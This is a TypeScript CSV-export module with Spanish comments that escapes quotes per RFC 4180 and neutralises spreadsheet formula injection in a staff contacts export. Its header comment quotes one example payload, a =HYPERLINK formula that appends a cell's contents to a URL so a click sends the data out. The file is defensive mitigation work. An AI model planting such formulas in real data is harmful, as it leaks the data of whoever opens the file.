/**
 * csv.ts — exportar contactos, sin romper el archivo ni ejecutar nada.
 *
 * `page-directory.js` montaba las filas así:
 *
 *     `"${u.full_name}"`, `"${u.position || ''}"`, …
 *
 * y eso tenía **dos defectos distintos**, los dos comprobados el 2026-09-11.
 *
 * ## 1 · Una comilla corría todas las columnas
 *
 * El campo se envolvía en comillas y las comillas de dentro no se duplicaban.
 * Con `Ana "La Jefa" Ruiz`, un lector de CSV de verdad leía:
 *
 *     fila 1: 6 columnas  ['Ana La Jefa" Ruiz"', …]     ← el nombre, mal
 *     fila 2: 7 columnas  [...]                          ← columnas desplazadas
 *
 * El correo de esa persona acababa bajo «Ciudad». Un solo apellido con comillas
 * corrompe su fila entera, y nadie lo nota hasta que alguien usa el archivo.
 *
 * ## 2 · Excel ejecutaba lo que hubiera en el campo
 *
 * Un valor que empiece por `=`, `+`, `-` o `@` es una **fórmula** para Excel,
 * LibreOffice y Google Sheets. `position` y `city` son texto que el propio
 * colaborador edita desde Mi ficha, y este archivo se llama «Exportar
 * contactos»: está hecho para abrirse en una hoja de cálculo.
 *
 *     =HYPERLINK("http://…?d="&A1,"Haz clic")
 *
 * Eso entraba tal cual. No es un defecto del portal —el portal solo escribe un
 * .csv— pero sí es el portal quien se lo entrega a Excel, y quien puede
 * impedirlo con un carácter.
 *
 * ## Lo que se hace
 *
 * Las dos cosas que dice OWASP para esto, y nada más:
 *
 *   · toda comilla dentro de un campo se duplica (`"` → `""`), que es lo que
 *     manda el RFC 4180;
 *   · un campo que empiece por `= + - @` (o por tabulador / retorno, que Excel
 *     también recorta) se prefija con un apóstrofo, que Excel entiende como
 *     «esto es texto» y no muestra.
 */

/** Los caracteres con los que Excel decide que una celda es una fórmula. */
const ARRANQUE_DE_FORMULA = /^[=+\-@\t\r]/;

/** Un campo listo para meter en una línea de CSV. */
export function campo(valor: unknown): string {
  let s = valor == null ? '' : String(valor);
  // El apóstrofo va ANTES de escapar las comillas: si se hiciera al revés, un
  // campo que empiece por `="` acabaría con el prefijo en medio del escapado.
  if (ARRANQUE_DE_FORMULA.test(s)) s = `'${s}`;
  return `"${s.replace(/"/g, '""')}"`;
}

export function linea(valores: unknown[]): string {
  return valores.map(campo).join(',');
}

/**
 * El documento entero, con BOM.
 *
 * El BOM (`﻿`) es lo que hace que Excel en Windows lea el archivo como
 * UTF-8 en vez de como la página de códigos del sistema. Sin él, «Bogotá» sale
 * «BogotÃ¡». Estaba en el vanilla y se conserva.
 *
 * Los saltos son `\r\n` porque es lo que pide el RFC 4180 y lo que Excel espera;
 * el vanilla usaba `\n`, que funciona en casi todo menos en las versiones
 * viejas de Excel para Windows.
 */
export function documento(cabeceras: string[], filas: unknown[][]): string {
  return '﻿' + [linea(cabeceras), ...filas.map(linea)].join('\r\n');
}

/** Entrega el archivo al navegador y suelta el object URL.
 *
 *  Se revoca en un `setTimeout` y no en la línea siguiente: Safari empieza la
 *  descarga de forma asíncrona tras el `click()`, y revocar en el acto le deja
 *  un archivo vacío. Cero es tiempo suficiente — basta con ceder el turno. */
export function descargar(nombre: string, contenido: string) {
  const url = URL.createObjectURL(
    new Blob([contenido], { type: 'text/csv;charset=utf-8;' }),
  );
  const a = document.createElement('a');
  a.href = url;
  a.download = nombre;
  a.click();
  setTimeout(() => URL.revokeObjectURL(url), 0);
}
